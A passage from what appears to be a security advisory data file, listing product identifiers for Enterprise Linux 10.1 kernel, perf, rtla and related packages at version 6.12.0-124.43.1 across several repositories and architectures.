"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
